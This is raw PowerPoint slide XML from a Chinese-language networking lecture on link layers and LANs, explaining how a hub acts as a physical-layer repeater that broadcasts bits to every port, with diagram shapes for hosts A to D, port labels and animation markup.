            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F2D48847-E646-4119-8C61-53E41934E92F}"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
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>集线器－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Hub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本质：物理层中继器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>处理基本单位是位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信号放大，延长网络距离</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>收到的位发送给所有其它连接节点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>多个端口使用相同的传输速率，没有帧缓存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSMA/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：由计算机的网卡检测冲突</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>链路层和局域网</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9223"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mtClean="0"/>
              <a:t>5-</a:t>
            </a:r>
            <a:fld id="{38D46BCE-A2F1-4A15-9FB2-1BC160972F3F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11274" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4988570" y="1263650"/>
            <a:ext cx="3471862" cy="3576638"/>
            <a:chOff x="3573" y="796"/>
            <a:chExt cx="2187" cy="2253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11275" name="Group 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3573" y="1063"/>
              <a:ext cx="2187" cy="1706"/>
              <a:chOff x="1234" y="2136"/>
              <a:chExt cx="2608" cy="1982"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11280" name="Rectangle 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2304" y="3074"/>
                <a:ext cx="267" cy="65"/>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aphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="11266" name="Object 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27950" name="Clip" r:id="rId1" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId1" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6279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27951" name="Clip" r:id="rId3" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId3" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6279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27952" name="Clip" r:id="rId4" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId4" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6279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1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27953" name="Clip" r:id="rId5" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId5" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6279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1" name="Rectangle 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1596" y="3002"/>
                <a:ext cx="116" cy="96"/>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1282" name="Rectangle 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3291" y="3002"/>
                <a:ext cx="116" cy="96"/>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1283" name="Rectangle 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2480" y="2458"/>
                <a:ext cx="91" cy="152"/>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1284" name="Rectangle 14"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2486" y="3649"/>
                <a:ext cx="91" cy="152"/>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1285" name="Line 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1712" y="3042"/>
                <a:ext cx="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86" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2515" y="2612"/>
                <a:ext cx="0" cy="35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87" name="Line 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2637" y="3042"/>
                <a:ext cx="6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88" name="Line 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2515" y="3131"/>
                <a:ext cx="8" cy="5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89" name="Text Box 1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t>twisted pair</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11290" name="Line 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2969" y="2839"/>
                <a:ext cx="187" cy="19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91" name="Text Box 2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t>hub</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11292" name="Line 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2053" y="3148"/>
                <a:ext cx="267" cy="1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76" name="Text Box 2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A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11277" name="Text Box 2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B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11278" name="Text Box 2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11279" name="Text Box 2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D</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="云形标注 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7385124" y="1282503"/>
            <a:ext cx="1301675" cy="935827"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88404"/>
              <a:gd name="adj2" fmla="val 9837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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>广播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C0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3219">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="393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3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3219">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="393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3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3219">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="393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3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3219">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3932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3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3219">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3932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3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3219">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3932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32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898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5-</a:t>
            </a:r>
            <a:fld id="{B4C8EC36-2C5E-445C-BB5D-52DB2E0BC566}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242888" y="0"/>
            <a:ext cx="8901112" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>集线器内部逻辑结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="260350" y="1320800"/>
            <a:ext cx="5068888" cy="268605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298" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41275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400" b="1"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12299" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1674813"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400" b="1"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="290830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400" b="1"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4137025"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400" b="1"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="81280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03" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2132013"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04" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330835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05" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4537075"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06" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="450850" y="1554163"/>
            <a:ext cx="4699000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>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394253" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531813" y="4368800"/>
            <a:ext cx="7083425" cy="2033588"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>集线器连接的网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>物理上是星型拓扑结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>逻辑上是总线型拓扑结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12308" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5732463" y="1066800"/>
            <a:ext cx="3471862" cy="3576638"/>
            <a:chOff x="3573" y="796"/>
            <a:chExt cx="2187" cy="2253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12309" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3573" y="1063"/>
              <a:ext cx="2187" cy="1706"/>
              <a:chOff x="1234" y="2136"/>
              <a:chExt cx="2608" cy="1982"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12314" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2304" y="3074"/>
                <a:ext cx="267" cy="65"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:miter lim="800000"/>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aphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="12290" name="Object 1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28978" name="Clip" r:id="rId1" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId1" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6289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1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28979" name="Clip" r:id="rId3" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId3" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6289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1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28980" name="Clip" r:id="rId4" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId4" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6289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2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28981" name="Clip" r:id="rId5" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId5" imgW="1307465" imgH="1083945" progId="MS_ClipArt_Gallery.2">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="0" name="图片 6289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5" name="Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1596" y="3002"/>
                <a:ext cx="116" cy="96"/>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16" name="Rectangle 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3291" y="3002"/>
                <a:ext cx="116" cy="96"/>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17" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2480" y="2458"/>
                <a:ext cx="91" cy="152"/>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18" name="Rectangle 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2486" y="3649"/>
                <a:ext cx="91" cy="152"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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12319" name="Line 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1712" y="3042"/>
                <a:ext cx="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20" name="Line 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2515" y="2612"/>
                <a:ext cx="0" cy="35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21" name="Line 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2637" y="3042"/>
                <a:ext cx="6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22" name="Line 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2515" y="3131"/>
                <a:ext cx="8" cy="5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23" name="Text Box 2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t>twisted pair</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12324" name="Line 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2969" y="2839"/>
                <a:ext cx="187" cy="19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5" name="Text Box 3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1600" b="1"/>
